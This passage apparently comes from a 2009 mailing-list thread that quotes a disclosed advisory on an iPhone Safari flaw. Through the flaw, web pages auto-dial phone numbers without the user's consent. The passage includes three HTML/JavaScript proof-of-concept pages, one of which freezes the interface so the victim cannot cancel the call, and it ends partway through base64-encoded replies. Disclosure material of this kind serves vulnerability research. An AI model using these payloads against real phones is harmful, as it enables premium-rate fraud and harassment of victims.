>>   protocol through launching the telephony/dialer application. This is
>>   done by passing the provided phone number to the telephony
>>   application. Under normal conditions, loading a tel: URI results in a
>>   message box asking the users permission to call the given number. The
>>   user is presented with the simple choice to either press call or
>>   cancel.
>>
>>   A TEL URI can be opened automatically if the TEL URI is used as the
>>   source of an HTML iframe or frame, as the URL of a meta refresh, as
>>   the location of a HTTP 30X redirect, and as the location of the
>>   current or a new window using javascript.
>>
>>   We discovered a security vulnerability that dismisses the "ask for
>>   permission to call" dialog in a way that chooses the "call" option
>>   rather than the "cancel" option.
>> 	
>>   This condition occurs if a TEL URI is activated at the same time
>>   Safari is closed by launching an external application, for example
>>   launching the SMS application (in order to handle a SMS URI [2]). The
>>   SMS application can be launched through placing a SMS URI as the
>>   source of an iframe. This is shown in the first proof-of-concept
>>   exploit below.
>> 	
>>   Further investigation showed that this behavior can be reproduced by
>>   launching other applications such as: Maps, YouTube, and iTunes.
>>   Launching these applications can be achieved through loading special
>>   URLs using the meta refresh tag. This is shown in the second
>>   proof-of-concept exploit below.
>>
>>   We also discovered that the bug can also be triggered through popup
>>   windows (e.g. javascript alert). In this situation the initiating app
>>   does not need to be termianted in order to active the call.
>> 	
>>   Finally, we discovered a second bug that can be used to perform
>>   malicious phone calls that cannot be prevented or canceled by the
>>   victim. This bug allows the attacker to freez the GUI (graphical user
>>   interface) for a number of seconds. While the GUI is frozen the call
>>   progresses in	the background and cannot be stopped by the victim user.
>>   Freezing the GUI is achieved by passing a "very long" phone number to
>>   the SMS application. The SMS application, immediately after being
>>   started, freezes the iPhone GUI. Also switching off the iPhone cannot
>>   be performed fast enough in order to prevent the malicious call.
>> 	
>>
>>   [1] http://www.rfc-editor.org/rfc/rfc3966.txt
>>   [2] http://tools.ietf.org/html/draft-antti-gsm-sms-url-04
>>
>> -----------------------------
>>
>> Further Discussion:
>>
>>   The dialing dialog is clearly shown to the user also the user, in most
>>   cases, cant press cancel quick enough in order to stop the initiation
>>   of the call. Once the external application is launched, the telephony
>>   application is running in the background performing the call. Only
>>   the call forwarding dialog (containing the "dismiss" button) indicates
>>   a call being made.
>>
>> -----------------------------
>>
>> Proof-of-Concept with plain HTML using the SMS application:
>>
>>   <html>
>>   <head>
>>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>>   </title>
>>   </head>
>>   <body>
>>   <iframe src="sms:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>>   <iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>>   <!-- second iframe is to attack quick users who manage to close the
>>        first call-dialog //-->
>>   <iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>>   </body>
>>   </html>
>>
>> Proof-of-Concept using javascript and the Maps application:
>>
>>   <html>
>>   <head>
>>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>>   </title>
>>   <meta http-equiv="refresh" content="0;
>>   URL=http://maps.google.de/maps?q=rheinstrasse+75+darmstadt">
>>   </head>
>>   <body>
>>   <script lang=javascript>
>>   function a() {
>>    document.write("<iframe src="tel:+14089748388" WIDTH=50 
>> HEIGHT=10></iframe>");
>>   }
>>   setTimeout("a()", 100);
>>   </script>
>>   </body>
>>   </html>
>> 	
>> Proof-of-Concept attack where the victim user cannot stop the malicious 
>> phone call:
>>
>>   <html>
>>   <head>
>>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>>   </title>
>>   </head>
>>   <body>
>>   <script lang=javascript>
>>   l = "<iframe src="sms:";
>>   for (i = 0; i < 10000; i++) {
>>           l = l + "3340948034298232";
>>   }
>>   l = l + "" width=10 height=10></iframe><iframe
>>   src="tel:+14089748388" height=10 width=10></iframe>";
>>   document.write(l);
>>   </script>
>>   </body>
>>   </html>
>>
>> -----------------------------
>>
>> More Detailed Information:
>>
>>  Demo video available at:
>>   http://www.mulliner.org/iphone/
>>
>>  Advisories:
>>   http://www.mulliner.org/security/advisories/
>>
>> --- END ADVISORY ---
>>
>>
>> -- 
>> Collin R. Mulliner <collin@betaversion.net>
>> info/pgp: finger collin@betaversion.net
>> If Bill Gates had a nickel for every time Windows crashed... Oh wait, he 
>> does!


-- 
Collin R. Mulliner <collin@betaversion.net>
info/pgp: finger collin@betaversion.net
C gives you enough rope to hang yourself. C++ also gives you the tree 
object to tie it to.


From: Mike Ely me@taupehat.com
Sent: Thu 18. Jun 2009 14:07
------OOQ6QVNMQ89GSPKM03TM81BMDDCI85
Content-Type: text/plain;
 charset=utf-8
Content-Transfer-Encoding: base64

UGVyaGFwcyBub3QgZ2V0dGluZyB0byB0aGUgZGlhbGVyLCBidXQgaGF2aW5nIHRoZSBkaWFsZXIg
bGF1bmNoIGF1dG9tYXRpY2FsbHkganVzdCBmcm9tIHZpZXdpbmcgYW4gZW1haWw/CgpDb2xsaW4g
TXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lvbi5uZXQ+IHdyb3RlOgoKPk1pa2UsDQo+DQo+anVz
dCBnZXR0aW5nIHRvIHRoZSBwaG9uZSBkaWFsZXIgaXMgbm90IGEgYnVnISBUaGF0IGlzIHdoYXQg
dGhlIHRlbDogDQo+cHJvdG9jb2wgaXMgZm9yLiBBbGwgbW9zdCBhbGwgbW9iaWxlIHBob25lcyBp
bXBsZW1lbnQgdGhpcywgZXZlcnkgdGltZSANCj55b3Ugb3BlbiBhIHRlbDogVVJMIHlvdSB3aWxs
IGdldCB0byB0aGUgZGlhbGVyIGluIHNvbWUgd2F5Lg0KPg0KPkNvbGxpbg0KPg0KPk1pa2UgRWx5
IHdyb3RlOg0KPj4gQ29uZmlybWVkIG9uIHRoZSBULU1vYmlsZSBHMSBlbWFpbCBhcHAgcnVubmlu
ZyBPUyB2ZXJzaW9uIDEuNS4gIFdhcyB3b25kZXJpbmcgd2h5IG15IHBob25lIHN0ZXBwZWQgb24g
ZW1haWwgdG8gZGlhbCBvdXQgd2hlbiBJIHJlYWQgdGhpcyBlbWFpbCBhbmQgdGhlbiBJIHJlYWQg
dGhlIHN1YmplY3QgbGluZSA7KQ0KPj4gDQo+PiBGV0lXLCBpdCBkaWRuJ3QgYWN0dWFsbHkgZGlh
bCwganVzdCBsb2FkZWQgdGhlIGRpYWxlciB3aXRoIHRoYXQgbnVtYmVyIHJlYWR5LiAgDQo+PiAN
Cj4+IExvb2tzIGxpa2UgdGhpcyBpcyBhIFdlYmtpdCBidWcsIG5vdCBTYWZhcmkuIA0KPj4gDQo+
PiBDb2xsaW4gTXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lvbi5uZXQ+IHdyb3RlOg0KPj4gDQo+
Pj4gUmVsZWFzZWQgc2luY2UgQXBwbGUgcHVibGlzaGVkIHRoZSBpUGhvbmUgMy4wIHNlY3VyaXR5
IGZpeGVzLg0KPj4+DQo+Pj4gVnVsbmVyYWJpbGl0eSBSZXBvcnQNCj4+Pg0KPj4+IC0tLSBCRUdJ
TiBBRFZJU09SWSAtLS0NCj4+Pg0KPj4+IE1hbnVmYWN0dXJlcjogQXBwbGUgKHd3dy5hcHBsZS5j
b20pDQo+Pj4gRGV2aWNlOiAgICAgICBpUGhvbmUgM0cgKGlQaG9uZSAxc3QgR2VuKQ0KPj4+IEZp
cm13YXJlOiAgICAgMi4xIChwb3NzaWJsZSBlYXJsaWVyIHZlcnNpb25zKQ0KPj4+IERldmljZSBU
eXBlOiAgc21hcnQgcGhvbmUNCj4+Pg0KPj4+IFN1YnN5c3RlbXM6IFNhZmFyaSAoYW5kIG1vYmls
ZSB0ZWxlcGhvbnkpDQo+Pj4NCj4+PiAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPj4+
DQo+Pj4gU2hvcnQgbmFtZToNCj4+PiAgIGlQaG9uZSBTYWZhcmkgcGhvbmUtYXV0by1kaWFsICh2
dWxuZXJhYmlsaXR5KQ0KPj4+DQo+Pj4gVnVsbmVyYWJpbGl0eSBjbGFzczoNCj4+PiAgIGFwcGxp
Y2F0aW9uIGxvZ2ljIGJ1Zw0KPj4+DQo+Pj4gRXhlY3V0aXZlIFN1bW1hcnk6DQo+Pj4gICBBIG1h
bGljaW91cyB3ZWJzaXRlIGNhbiBpbml0aWF0ZSBhIHBob25lIGNhbGwgd2l0aG91dCB0aGUgbmVl
ZCBvZiB1c2VyDQo+Pj4gICBpbnRlcmFjdGlvbi4gVGhlIGRlc3RpbmF0aW9uIHBob25lIG51bWJl
ciBpcyBjaG9zZW4gYnkgdGhlIGF0dGFja2VyLg0KPj4+DQo+Pj4gUmlzazogTUVESVVNLUhJR0gN
Cj4+PiAgIE1lZGl1bSB0byBoaWdoIHJpc2sgZHVlIHRvIHRoZSBwb3NzaWJpbGl0eSBvZiBmaW5h
bmNpYWwgZ2FpbiB0aHJvdWdoDQo+Pj4gICB0aGlzIGF0dGFjayBieSBjYWxsaW5nIG9mIHByZW1p
dW0gcmF0ZSBudW1iZXJzIChlLmcuIDEtOTAwIGluIHRoZQ0KPj4+ICAgVS5TLikuIERlbmlhbC1v
Zi1zZXJ2aWNlIGFnYWluc3QgYXJiaXRyYXJ5IHBob25lIG51bWJlcnMgdGhyb3VnaA0KPj4+ICAg
bWFzcy1jYWxsaW5nLiBVc2VyIGNhbm5vdCBwcmV2ZW50IGF0dGFjay4NCj4+Pg0KPj4+IC0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQo+Pj4NCj4+PiBSZXBvcnRlcjogQ29sbGluIE11bGxp
bmVyIDxjb2xsaW5bQVRdbXVsbGluZXIub3JnPg0KPj4+DQo+Pj4gLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0NCj4+Pg0KPj4+IEFmZmlsaWF0aW9uOiBNVWxsaU5FUi5PUkcgLyB0aGUgdHJp
ZmluaXRlIGdyb3VwIC8gKEZyYXVuaG9mZXIgU0lUKQ0KPj4+DQo+Pj4gLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0NCj4+Pg0KPj4+IFRpbWUgbGluZToNCj4+Pg0KPj4+ICAgT2N0LiAyMC4g
MjAwODogUmVwb3J0ZWQgdnVsbmVyYWJpbGl0eSB0byB2ZW5kb3IuDQo+Pj4gICBPY3QuIDIwLiAy
MDA4OiBWZW5kb3IgYWNrbm93bGVkZ2VzIHJlY2VpdmluZyBvdXIgZW1haWwuDQo+Pj4gICAgICAg
ICAgICAgICAgICBOb3QgY29tbWVudGluZyBvbiB0aGUgdnVsbmVyYWJpbGl0eSBpdHNlbGYuDQo+
Pj4gICBPY3QuIDI3LiAyMDA4OiBTZW50IHVwZGF0ZSB0byB2ZW5kb3IsIGFsc28gcmVxdWVzdGlu
ZyBhIHN0YXR1cyByZXBvcnQuDQo+Pj4gICBPY3QuIDI5LiAyMDA4OiBSZXBseSBmcm9tIHZlbmRv
ciBhY2tub3dsZWRnaW5nIHRoZSB2dWxuZXJhYmlsaXR5Lg0KPj4+ICAgT2N0LiAzMC4gMjAwODog
U2VudCBhZGRpdGlvbmFsIGluZm9ybWF0aW9uLg0KPj4+ICAgTm92LiAxMy4gMjAwODogVmVuZGVy
IHNheXMgdnVsbmVyYWJpbGl0eSBpcyBmaXhlZCBpbiB1cGNvbWluZyBPUw0KPj4+ICAgICAgICAg
ICAgICAgICAgdmVyc2lvbi4NCj4+PiAgIE5vdi4gMjAuIDIwMDg6IFB1YmxpYyBkaXNjbG9zdXJl
Lg0KPj4+ICAgSnVuLiAxOC4gMjAwOTogRnVsbC1EaXNjbG9zdXJlLg0KPj4+DQo+Pj4gLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCj4+Pg0KPj4+IEZpeDoNCj4+Pg0KPj4+ICAgaVBob25l
IE9TIDIuMg0KPj4+ICAgaVBob25lIE9TIDIuMi4xDQo+Pj4gICBpUGhvbmUgT1MgMy4wDQo+Pj4g
CQ0KPj4+IC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQo+Pj4NCj4+PiBUZWNobmljYWwg
RGV0YWlsczoNCj4+Pg0KPj4+ICAgVGhlIFNhZmFyaSB2ZXJzaW9uIHJ1bm5pbmcgb24gdGhlIGlQ
aG9uZSBzdXBwb3J0cyBoYW5kbGluZyB0aGUgVEVMIFsxXQ0KPj4+ICAgcHJvdG9jb2wgdGhyb3Vn
aCBsYXVuY2hpbmcgdGhlIHRlbGVwaG9ueS9kaWFsZXIgYXBwbGljYXRpb24uIFRoaXMgaXMNCj4+
PiAgIGRvbmUgYnkgcGFzc2luZyB0aGUgcHJvdmlkZWQgcGhvbmUgbnVtYmVyIHRvIHRoZSB0ZWxl
cGhvbnkNCj4+PiAgIGFwcGxpY2F0aW9uLiBVbmRlciBub3JtYWwgY29uZGl0aW9ucywgbG9hZGlu
ZyBhIHRlbDogVVJJIHJlc3VsdHMgaW4gYQ0KPj4+ICAgbWVzc2FnZSBib3ggYXNraW5nIHRoZSB1
c2VyJ3MgcGVybWlzc2lvbiB0byBjYWxsIHRoZSBnaXZlbiBudW1iZXIuIFRoZQ0KPj4+ICAgdXNl
ciBpcyBwcmVzZW50ZWQgd2l0aCB0aGUgc2ltcGxlIGNob2ljZSB0byBlaXRoZXIgcHJlc3MgY2Fs
bCBvcg0KPj4+ICAgY2FuY2VsLg0KPj4+DQo+Pj4gICBBIFRFTCBVUkkgY2FuIGJlIG9wZW5lZCBh
dXRvbWF0aWNhbGx5IGlmIHRoZSBURUwgVVJJIGlzIHVzZWQgYXMgdGhlDQo+Pj4gICBzb3VyY2Ug
b2YgYW4gSFRNTCBpZnJhbWUgb3IgZnJhbWUsIGFzIHRoZSBVUkwgb2YgYSBtZXRhIHJlZnJlc2gs
IGFzDQo+Pj4gICB0aGUgbG9jYXRpb24gb2YgYSBIVFRQIDMwWCByZWRpcmVjdCwgYW5kIGFzIHRo
ZSBsb2NhdGlvbiBvZiB0aGUNCj4+PiAgIGN1cnJlbnQgb3IgYSBuZXcgd2luZG93IHVzaW5nIGph
dmFzY3JpcHQuDQo+Pj4NCj4+PiAgIFdlIGRpc2NvdmVyZWQgYSBzZWN1cml0eSB2dWxuZXJhYmls
aXR5IHRoYXQgZGlzbWlzc2VzIHRoZSAiYXNrIGZvcg0KPj4+ICAgcGVybWlzc2lvbiB0byBjYWxs
IiBkaWFsb2cgaW4gYSB3YXkgdGhhdCBjaG9vc2VzIHRoZSAiY2FsbCIgb3B0aW9uDQo+Pj4gICBy
YXRoZXIgdGhhbiB0aGUgImNhbmNlbCIgb3B0aW9uLg0KPj4+IAkNCj4+PiAgIFRoaXMgY29uZGl0
aW9uIG9jY3VycyBpZiBhIFRFTCBVUkkgaXMgYWN0aXZhdGVkIGF0IHRoZSBzYW1lIHRpbWUNCj4+
PiAgIFNhZmFyaSBpcyBjbG9zZWQgYnkgbGF1bmNoaW5nIGFuIGV4dGVybmFsIGFwcGxpY2F0aW9u
LCBmb3IgZXhhbXBsZQ0KPj4+ICAgbGF1bmNoaW5nIHRoZSBTTVMgYXBwbGljYXRpb24gKGluIG9y
ZGVyIHRvIGhhbmRsZSBhIFNNUyBVUkkgWzJdKS4gVGhlDQo+Pj4gICBTTVMgYXBwbGljYXRpb24g
Y2FuIGJlIGxhdW5jaGVkIHRocm91Z2ggcGxhY2luZyBhIFNNUyBVUkkgYXMgdGhlDQo+Pj4gICBz
b3VyY2Ugb2YgYW4gaWZyYW1lLiBUaGlzIGlzIHNob3duIGluIHRoZSBmaXJzdCBwcm9vZi1vZi1j
b25jZXB0DQo+Pj4gICBleHBsb2l0IGJlbG93Lg0KPj4+IAkNCj4+PiAgIEZ1cnRoZXIgaW52ZXN0
aWdhdGlvbiBzaG93ZWQgdGhhdCB0aGlzIGJlaGF2aW9yIGNhbiBiZSByZXByb2R1Y2VkIGJ5DQo+
Pj4gICBsYXVuY2hpbmcgb3RoZXIgYXBwbGljYXRpb25zIHN1Y2ggYXM6IE1hcHMsIFlvdVR1YmUs
IGFuZCBpVHVuZXMuDQo+Pj4gICBMYXVuY2hpbmcgdGhlc2UgYXBwbGljYXRpb25zIGNhbiBiZSBh
Y2hpZXZlZCB0aHJvdWdoIGxvYWRpbmcgc3BlY2lhbA0KPj4+ICAgVVJMcyB1c2luZyB0aGUgbWV0
YSByZWZyZXNoIHRhZy4gVGhpcyBpcyBzaG93biBpbiB0aGUgc2Vjb25kDQo+Pj4gICBwcm9vZi1v
Zi1jb25jZXB0IGV4cGxvaXQgYmVsb3cuDQo+Pj4NCj4+PiAgIFdlIGFsc28gZGlzY292ZXJlZCB0
aGF0IHRoZSBidWcgY2FuIGFsc28gYmUgdHJpZ2dlcmVkIHRocm91Z2ggcG9wdXANCj4+PiAgIHdp
bmRvd3MgKGUuZy4gamF2YXNjcmlwdCBhbGVydCkuIEluIHRoaXMgc2l0dWF0aW9uIHRoZSBpbml0
aWF0aW5nIGFwcA0KPj4+ICAgZG9lcyBub3QgbmVlZCB0byBiZSB0ZXJtaWFudGVkIGluIG9yZGVy
IHRvIGFjdGl2ZSB0aGUgY2FsbC4NCj4+PiAJDQo+Pj4gICBGaW5hbGx5LCB3ZSBkaXNjb3ZlcmVk
IGEgc2Vjb25kIGJ1ZyB0aGF0IGNhbiBiZSB1c2VkIHRvIHBlcmZvcm0NCj4+PiAgIG1hbGljaW91
cyBwaG9uZSBjYWxscyB0aGF0IGNhbm5vdCBiZSBwcmV2ZW50ZWQgb3IgY2FuY2VsZWQgYnkgdGhl
DQo+Pj4gICB2aWN0aW0uIFRoaXMgYnVnIGFsbG93cyB0aGUgYXR0YWNrZXIgdG8gZnJlZXogdGhl
IEdVSSAoZ3JhcGhpY2FsIHVzZXINCj4+PiAgIGludGVyZmFjZSkgZm9yIGEgbnVtYmVyIG9mIHNl
Y29uZHMuIFdoaWxlIHRoZSBHVUkgaXMgZnJvemVuIHRoZSBjYWxsDQo+Pj4gICBwcm9ncmVzc2Vz
IGluCXRoZSBiYWNrZ3JvdW5kIGFuZCBjYW5ub3QgYmUgc3RvcHBlZCBieSB0aGUgdmljdGltIHVz
ZXIuDQo+Pj4gICBGcmVlemluZyB0aGUgR1VJIGlzIGFjaGlldmVkIGJ5IHBhc3NpbmcgYSAidmVy
eSBsb25nIiBwaG9uZSBudW1iZXIgdG8NCj4+PiAgIHRoZSBTTVMgYXBwbGljYXRpb24uIFRoZSBT
TVMgYXBwbGljYXRpb24sIGltbWVkaWF0ZWx5IGFmdGVyIGJlaW5nDQo+Pj4gICBzdGFydGVkLCBm
cmVlemVzIHRoZSBpUGhvbmUgR1VJLiBBbHNvIHN3aXRjaGluZyBvZmYgdGhlIGlQaG9uZSBjYW5u
b3QNCj4+PiAgIGJlIHBlcmZvcm1lZCBmYXN0IGVub3VnaCBpbiBvcmRlciB0byBwcmV2ZW50IHRo
ZSBtYWxpY2lvdXMgY2FsbC4NCj4+PiAJDQo+Pj4NCj4+PiAgIFsxXSBodHRwOi8vd3d3LnJmYy1l
ZGl0b3Iub3JnL3JmYy9yZmMzOTY2LnR4dA0KPj4+ICAgWzJdIGh0dHA6Ly90b29scy5pZXRmLm9y
Zy9odG1sL2RyYWZ0LWFudHRpLWdzbS1zbXMtdXJsLTA0DQo+Pj4NCj4+PiAtLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLQ0KPj4+DQo+Pj4gRnVydGhlciBEaXNjdXNzaW9uOg0KPj4+DQo+Pj4g
ICBUaGUgZGlhbGluZyBkaWFsb2cgaXMgY2xlYXJseSBzaG93biB0byB0aGUgdXNlciBhbHNvIHRo
ZSB1c2VyLCBpbiBtb3N0DQo+Pj4gICBjYXNlcywgY2FuJ3QgcHJlc3MgY2FuY2VsIHF1aWNrIGVu
b3VnaCBpbiBvcmRlciB0byBzdG9wIHRoZSBpbml0aWF0aW9uDQo+Pj4gICBvZiB0aGUgY2FsbC4g
T25jZSB0aGUgZXh0ZXJuYWwgYXBwbGljYXRpb24gaXMgbGF1bmNoZWQsIHRoZSB0ZWxlcGhvbnkN
Cj4+PiAgIGFwcGxpY2F0aW9uIGlzIHJ1bm5pbmcgaW4gdGhlIGJhY2tncm91bmQgcGVyZm9ybWlu
ZyB0aGUgY2FsbC4gT25seQ0KPj4+ICAgdGhlIGNhbGwgZm9yd2FyZGluZyBkaWFsb2cgKGNvbnRh
aW5pbmcgdGhlICJkaXNtaXNzIiBidXR0b24pIGluZGljYXRlcw0KPj4+ICAgYSBjYWxsIGJlaW5n
IG1hZGUuDQo+Pj4NCj4+PiAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPj4+DQo+Pj4g
UHJvb2Ytb2YtQ29uY2VwdCB3aXRoIHBsYWluIEhUTUwgdXNpbmcgdGhlIFNNUyBhcHBsaWNhdGlv
bjoNCj4+Pg0KPj4+ICAgPGh0bWw+DQo+Pj4gICA8aGVhZD4NCj4+PiAgIDx0aXRsZT5pUGhvbmUg
U2FmYXJpIHBob25lLWF1dG8tZGlhbCBFeHBsb2l0IERlbW8gYnkgQ29sbGluIE11bGxpbmVyDQo+
Pj4gICA8L3RpdGxlPg0KPj4+ICAgPC9oZWFkPg0KPj4+ICAgPGJvZHk+DQo+Pj4gICA8aWZyYW1l
IHNyYz0ic21zOisxNDA4OTc0ODM4OCIgV0lEVEg9NTAgSEVJR0hUPTEwPjwvaWZyYW1lPg0KPj4+
ICAgPGlmcmFtZSBzcmM9InRlbDorMTQwODk3NDgzODgiIFdJRFRIPTUwIEhFSUdIVD0xMD48L2lm
cmFtZT4NCj4+PiAgIDwhLS0gc2Vjb25kIGlmcmFtZSBpcyB0byBhdHRhY2sgcXVpY2sgdXNlcnMg
d2hvIG1hbmFnZSB0byBjbG9zZSB0aGUNCj4+PiAgICAgICAgZmlyc3QgY2FsbC1kaWFsb2cgLy8t
LT4NCj4+PiAgIDxpZnJhbWUgc3JjPSJ0ZWw6KzE0MDg5NzQ4Mzg4IiBXSURUSD01MCBIRUlHSFQ9
MTA+PC9pZnJhbWU+DQo+Pj4gICA8L2JvZHk+DQo+Pj4gICA8L2h0bWw+DQo+Pj4NCj4+PiBQcm9v
Zi1vZi1Db25jZXB0IHVzaW5nIGphdmFzY3JpcHQgYW5kIHRoZSBNYXBzIGFwcGxpY2F0aW9uOg0K
Pj4+DQo+Pj4gICA8aHRtbD4NCj4+PiAgIDxoZWFkPg0KPj4+ICAgPHRpdGxlPmlQaG9uZSBTYWZh
cmkgcGhvbmUtYXV0by1kaWFsIEV4cGxvaXQgRGVtbyBieSBDb2xsaW4gTXVsbGluZXINCj4+PiAg
IDwvdGl0bGU+DQo+Pj4gICA8bWV0YSBodHRwLWVxdWl2PSJyZWZyZXNoIiBjb250ZW50PSIwOw0K
Pj4+ICAgVVJMPWh0dHA6Ly9tYXBzLmdvb2dsZS5kZS9tYXBzP3E9cmhlaW5zdHJhc3NlKzc1K2Rh
cm1zdGFkdCI+DQo+Pj4gICA8L2hlYWQ+DQo+Pj4gICA8Ym9keT4NCj4+PiAgIDxzY3JpcHQgbGFu
Zz1qYXZhc2NyaXB0Pg0KPj4+ICAgZnVuY3Rpb24gYSgpIHsNCj4+PiAgICBkb2N1bWVudC53cml0
ZSgiPGlmcmFtZSBzcmM9XCJ0ZWw6KzE0MDg5NzQ4Mzg4XCIgV0lEVEg9NTAgDQo+Pj4gSEVJR0hU
PTEwPjwvaWZyYW1lPiIpOw0KPj4+ICAgfQ0KPj4+ICAgc2V0VGltZW91dCgiYSgpIiwgMTAwKTsN
Cj4+PiAgIDwvc2NyaXB0Pg0KPj4+ICAgPC9ib2R5Pg0KPj4+ICAgPC9odG1sPg0KPj4+IAkNCj4+
PiBQcm9vZi1vZi1Db25jZXB0IGF0dGFjayB3aGVyZSB0aGUgdmljdGltIHVzZXIgY2Fubm90IHN0
b3AgdGhlIG1hbGljaW91cyANCj4+PiBwaG9uZSBjYWxsOg0KPj4+DQo+Pj4gICA8aHRtbD4NCj4+
PiAgIDxoZWFkPg0KPj4+ICAgPHRpdGxlPmlQaG9uZSBTYWZhcmkgcGhvbmUtYXV0by1kaWFsIEV4
cGxvaXQgRGVtbyBieSBDb2xsaW4gTXVsbGluZXINCj4+PiAgIDwvdGl0bGU+DQo+Pj4gICA8L2hl
YWQ+DQo+Pj4gICA8Ym9keT4NCj4+PiAgIDxzY3JpcHQgbGFuZz1qYXZhc2NyaXB0Pg0KPj4+ICAg
bCA9ICI8aWZyYW1lIHNyYz1cInNtczoiOw0KPj4+ICAgZm9yIChpID0gMDsgaSA8IDEwMDAwOyBp
KyspIHsNCj4+PiAgICAgICAgICAgbCA9IGwgKyAiMzM0MDk0ODAzNDI5ODIzMiI7DQo+Pj4gICB9
DQo+Pj4gICBsID0gbCArICJcIiB3aWR0aD0xMCBoZWlnaHQ9MTA+PC9pZnJhbWU+PGlmcmFtZQ0K
Pj4+ICAgc3JjPVwidGVsOisxNDA4OTc0ODM4OFwiIGhlaWdodD0xMCB3aWR0aD0xMD48L2lmcmFt
ZT4iOw0KPj4+ICAgZG9jdW1lbnQud3JpdGUobCk7DQo+Pj4gICA8L3NjcmlwdD4NCj4+PiAgIDwv
Ym9keT4NCj4+PiAgIDwvaHRtbD4NCj4+Pg0KPj4+IC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tDQo+Pj4NCj4+PiBNb3JlIERldGFpbGVkIEluZm9ybWF0aW9uOg0KPj4+DQo+Pj4gIERlbW8g
dmlkZW8gYXZhaWxhYmxlIGF0Og0KPj4+ICAgaHR0cDovL3d3dy5tdWxsaW5lci5vcmcvaXBob25l
Lw0KPj4+DQo+Pj4gIEFkdmlzb3JpZXM6DQo+Pj4gICBodHRwOi8vd3d3Lm11bGxpbmVyLm9yZy9z
ZWN1cml0eS9hZHZpc29yaWVzLw0KPj4+DQo+Pj4gLS0tIEVORCBBRFZJU09SWSAtLS0NCj4+Pg0K
Pj4+DQo+Pj4gLS0gDQo+Pj4gQ29sbGluIFIuIE11bGxpbmVyIDxjb2xsaW5AYmV0YXZlcnNpb24u
bmV0Pg0KPj4+IGluZm8vcGdwOiBmaW5nZXIgY29sbGluQGJldGF2ZXJzaW9uLm5ldA0KPj4+IElm
IEJpbGwgR2F0ZXMgaGFkIGEgbmlja2VsIGZvciBldmVyeSB0aW1lIFdpbmRvd3MgY3Jhc2hlZC4u
LiBPaCB3YWl0LCBoZSANCj4+PiBkb2VzIQ0KPg0KPg0KPi0tIA0KPkNvbGxpbiBSLiBNdWxsaW5l
ciA8Y29sbGluQGJldGF2ZXJzaW9uLm5ldD4NCj5pbmZvL3BncDogZmluZ2VyIGNvbGxpbkBiZXRh
dmVyc2lvbi5uZXQNCj5DIGdpdmVzIHlvdSBlbm91Z2ggcm9wZSB0byBoYW5nIHlvdXJzZWxmLiBD
KysgYWxzbyBnaXZlcyB5b3UgdGhlIHRyZWUgDQo+b2JqZWN0IHRvIHRpZSBpdCB0by4NCg==

------OOQ6QVNMQ89GSPKM03TM81BMDDCI85--



From: Mike Ely me@taupehat.com
Sent: Thu 18. Jun 2009 09:14
------OOQR8OIVASFMLRMIKQ9G04MAIHM98G
Content-Type: text/plain;
 charset=utf-8
Content-Transfer-Encoding: base64

Q29uZmlybWVkIG9uIHRoZSBULU1vYmlsZSBHMSBlbWFpbCBhcHAgcnVubmluZyBPUyB2ZXJzaW9u
IDEuNS4gIFdhcyB3b25kZXJpbmcgd2h5IG15IHBob25lIHN0ZXBwZWQgb24gZW1haWwgdG8gZGlh
bCBvdXQgd2hlbiBJIHJlYWQgdGhpcyBlbWFpbCBhbmQgdGhlbiBJIHJlYWQgdGhlIHN1YmplY3Qg
bGluZSA7KQoKRldJVywgaXQgZGlkbid0IGFjdHVhbGx5IGRpYWwsIGp1c3QgbG9hZGVkIHRoZSBk
aWFsZXIgd2l0aCB0aGF0IG51bWJlciByZWFkeS4gIAoKTG9va3MgbGlrZSB0aGlzIGlzIGEgV2Vi
a2l0IGJ1Zywgbm90IFNhZmFyaS4gCgpDb2xsaW4gTXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lv
bi5uZXQ+IHdyb3RlOgoKPlJlbGVhc2VkIHNpbmNlIEFwcGxlIHB1Ymxpc2hlZCB0aGUgaVBob25l
IDMuMCBzZWN1cml0eSBmaXhlcy4NCj4NCj5WdWxuZXJhYmlsaXR5IFJlcG9ydA0KPg0KPi0tLSBC
RUdJTiBBRFZJU09SWSAtLS0NCj4NCj5NYW51ZmFjdHVyZXI6IEFwcGxlICh3d3cuYXBwbGUuY29t
KQ0KPkRldmljZTogICAgICAgaVBob25lIDNHIChpUGhvbmUgMXN0IEdlbikNCj5GaXJtd2FyZTog
ICAgIDIuMSAocG9zc2libGUgZWFybGllciB2ZXJzaW9ucykNCj5EZXZpY2UgVHlwZTogIHNtYXJ0
IHBob25lDQo+DQo+U3Vic3lzdGVtczogU2FmYXJpIChhbmQgbW9iaWxlIHRlbGVwaG9ueSkNCj4N
Cj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPg0KPlNob3J0IG5hbWU6DQo+ICAgaVBo
b25lIFNhZmFyaSBwaG9uZS1hdXRvLWRpYWwgKHZ1bG5lcmFiaWxpdHkpDQo+DQo+VnVsbmVyYWJp
bGl0eSBjbGFzczoNCj4gICBhcHBsaWNhdGlvbiBsb2dpYyBidWcNCj4NCj5FeGVjdXRpdmUgU3Vt
bWFyeToNCj4gICBBIG1hbGljaW91cyB3ZWJzaXRlIGNhbiBpbml0aWF0ZSBhIHBob25lIGNhbGwg
d2l0aG91dCB0aGUgbmVlZCBvZiB1c2VyDQo+ICAgaW50ZXJhY3Rpb24uIFRoZSBkZXN0aW5hdGlv
